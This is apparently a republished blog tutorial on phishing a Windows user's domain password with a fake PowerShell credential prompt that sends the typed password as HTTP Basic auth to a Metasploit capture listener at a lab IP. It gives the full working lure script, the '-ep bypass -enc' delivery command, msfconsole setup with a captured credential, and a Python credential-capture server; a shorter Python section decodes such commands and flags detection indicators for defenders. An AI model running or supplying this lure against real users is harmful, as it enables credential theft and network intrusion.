
[Combo] PowerShell credential pop-up + Capture module

2015-02-01 18:00

Metasploit Minute is into its third season. This episode pairs Metasploit's capture module with a PowerShell credential pop-up to harvest the logged-on user's password. No admin rights, no UAC bypass: the user types the password into a dialog and PowerShell hands it to our listener as HTTP Basic auth over SSL.

Here is the code:

$cred = $host.ui.promptforcredential('FailedAuthentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username,$cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

Let's take it apart line by line.

$cred = $host.ui.promptforcredential('FailedAuthentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);

This pops the standard Windows credential dialog. The caption reads "FailedAuthentication" and the message body is empty (everything else is left at its defaults), and the username field comes pre-filled with DOMAIN\user, which makes the prompt look like a genuine re-authentication request. Note that the arguments are (caption, message, userName, targetName), so the domain is passed as the target name and also prepended to the username.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Tells PowerShell not to validate the server's SSL certificate, so our HTTPS listener can use a self-signed certificate (Metasploit generates one by default). The callback is a static, process-wide setting, so every HTTPS request from this PowerShell process is unverified from this point on.

$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

Creates a new WebClient object and sets its User-Agent so the request looks like it came from wget rather than from PowerShell.

$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

Tells the WebClient to use whatever proxy the current user's system is configured with, and to authenticate to that proxy with the current user's default (Windows) credentials. Without this, the request would die at an authenticating corporate proxy before it ever reached our listener.

$wc.credentials = new-object system.net.networkcredential($cred.username,$cred.getnetworkcredential().password, '');

Sets the credentials the WebClient will present for HTTP authentication to whatever the user just typed into the pop-up. GetNetworkCredential().Password turns the SecureString from the dialog back into plaintext. Because the username field was pre-filled with DOMAIN\user and the domain argument here is empty, the DOMAIN\user string is what ends up in the Basic auth header.

$result = $wc.downloadstring('https://172.16.102.163');

The last line makes the request. Our listener answers with a 401 and a Basic challenge, WebClient retries with the credentials, and the capture module on the Metasploit side logs them. To deliver the script, encode it the way powershell.exe -EncodedCommand expects (base64 over the UTF-16LE bytes of the script):

cat power.txt | iconv --to-code UTF-16LE | base64 -w 0

(-w 0 keeps the output on a single line; GNU base64 wraps at 76 characters by default, and a wrapped blob will not paste cleanly into -enc.)

Then run:

powershell -ep bypass -enc <the encoded text from above>
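The encoding step and its inverse, as an added Python example (my own code, not from the post or from Metasploit): encode_command does what the iconv | base64 pipeline above does, decode_command reverses it, and triage_encoded_command is the defender's side, pulling the -enc argument out of a logged command line and flagging the parts of this particular script worth alerting on (PromptForCredential, the certificate callback forced to $true, the plaintext password handed to NetworkCredential). The LURE string is a constructed copy of the script walked through above; the indicator regexes, function names and the sample command line are my own assumptions.

```python
import base64
import re

# Constructed copy of the lure script from this post (host address is the post's lab IP).
LURE = r"""$cred = $host.ui.PromptForCredential('FailedAuthentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = New-Object Net.WebClient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.Credentials = New-Object System.Net.NetworkCredential($cred.UserName,$cred.GetNetworkCredential().Password,'');
$result = $wc.DownloadString('https://172.16.102.163');
"""


def encode_command(script):
    """Same bytes as: cat power.txt | iconv --to-code UTF-16LE | base64 -w 0
    powershell.exe -EncodedCommand wants base64 over UTF-16LE, no BOM, no newlines."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded):
    """Reverse of encode_command; tolerates a blob that was line-wrapped by base64."""
    return base64.b64decode("".join(encoded.split())).decode("utf-16-le")


# Indicators of this credential-phishing pattern (regexes are my own; PowerShell is
# case-insensitive, so the matching is too).
INDICATORS = {
    "credential_prompt": r"PromptForCredential",
    "tls_validation_disabled": r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}",
    "creds_sent_over_http": r"\.Credentials\s*=\s*New-Object\s+System\.Net\.NetworkCredential",
    "plaintext_password": r"GetNetworkCredential\(\)\.Password",
}


def flag_indicators(script):
    """Sorted names of the indicators present in a decoded script."""
    return sorted(name for name, pat in INDICATORS.items()
                  if re.search(pat, script, re.IGNORECASE))


# -e, -ec, -enc and -EncodedCommand are the spellings handled here; PowerShell accepts any
# unambiguous prefix of -EncodedCommand, so extend the alternation if your logs show others.
_ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def triage_encoded_command(cmdline):
    """Given a logged powershell.exe command line, return (decoded_script, indicator_names).
    Returns (None, []) when there is no encoded argument or it does not decode."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None, []
    try:
        script = decode_command(m.group(1))
    except (ValueError, UnicodeDecodeError):
        return None, []
    return script, flag_indicators(script)


if __name__ == "__main__":
    blob = encode_command(LURE)
    # Constructed command line, as it would appear in process-creation logging (e.g. 4688 with
    # command-line auditing on).
    logged = "powershell -ep bypass -enc " + blob
    script, flags = triage_encoded_command(logged)
    print("decoded OK:", script == LURE)
    print("indicators:", flags)
```

On the defensive side, the useful point is that the whole script is recoverable from the command line alone: nothing here is obfuscated beyond the UTF-16LE/base64 wrapping, so command-line auditing or PowerShell script block logging exposes every indicator the module relies on.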

On the Metasploit side you should see something like this:

root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /
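What the module is doing on the wire, as an added Python example (my own code, not Metasploit's): a listener that answers any request without an Authorization header with a 401 and a Basic challenge, then decodes the credential from the retry. The realm string matches the module's default shown above; the two request dictionaries are constructed here to stand in for WebClient's first request and its retry, and the Authorization value is base64 of the SITTINGDUCK\user:ASDqwe123 credential from the output above. TLS is left out so the walk-through runs offline (the real listener needs it only because the lure disables certificate validation).

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer

REALM = "Secure Site"  # default realm of auxiliary/server/capture/http_basic


def challenge_headers(realm=REALM):
    """Headers for the 401 that makes WebClient retry with its NetworkCredential."""
    return {"WWW-Authenticate": f'Basic realm="{realm}"', "Content-Length": "0"}


def parse_basic(authorization):
    """(username, password) from an 'Authorization: Basic ...' value, or None if absent/malformed."""
    if not authorization:
        return None
    scheme, _, token = authorization.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    if not sep:
        return None
    return user, password


def handle_request(headers):
    """Decision for one request: (status, response_headers, credential_or_None).
    `headers` is any mapping with .get(), e.g. http.server's HTTPMessage."""
    cred = parse_basic(headers.get("Authorization"))
    if cred is None:
        return 401, challenge_headers(), None
    return 200, {"Content-Length": "0"}, cred


class CaptureHandler(BaseHTTPRequestHandler):
    """Minimal stand-in for the capture module's HTTP handler."""

    def do_GET(self):
        status, hdrs, cred = handle_request(self.headers)
        ip = self.client_address[0]
        if cred:
            print(f"[+] {ip} - Credential collected: \"{cred[0]}:{cred[1]}\" => {self.path}")
        else:
            print(f"[*] {ip} - Sending 401 to client {ip}")
        self.send_response(status)
        for k, v in hdrs.items():
            self.send_header(k, v)
        self.end_headers()

    def log_message(self, *args):  # keep stdout to the capture lines only
        pass


# Constructed exchange. WebClient's first request carries no Authorization header ...
FIRST_REQUEST = {"User-Agent": "Wget/1.9+cvs-stable (Red Hat modified)"}
# ... and after the 401 it retries with base64("SITTINGDUCK\user:ASDqwe123").
RETRY_REQUEST = dict(FIRST_REQUEST, Authorization="Basic U0lUVElOR0RVQ0tcdXNlcjpBU0Rxd2UxMjM=")


def serve(port=8080):
    """Plain-HTTP listener (assumed port); put TLS in front of it for the real lure."""
    HTTPServer(("0.0.0.0", port), CaptureHandler).serve_forever()


if __name__ == "__main__":
    # Offline walk-through of the two-step exchange; call serve() for a live listener.
    print(handle_request(FIRST_REQUEST))
    print(handle_request(RETRY_REQUEST))
```

The second tuple is the whole trick: WebClient treats a 401 with a Basic challenge as a routine prompt to send the credentials it was given, and since those came straight from the dialog, the server receives the user's domain password in the clear inside the TLS session.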
Game Over

This write-up is easier to follow alongside the video.

Links:

https://www.youtube.com/watch?v=H_E3FNF8rBw

Mirror: http://pan.baidu.com/s/1eQvkw6Y password: mysb [low-bandwidth mirror, the video quality is not great]

[via the @91RI.ORG team]

Source: www.91ri.org/12220.html
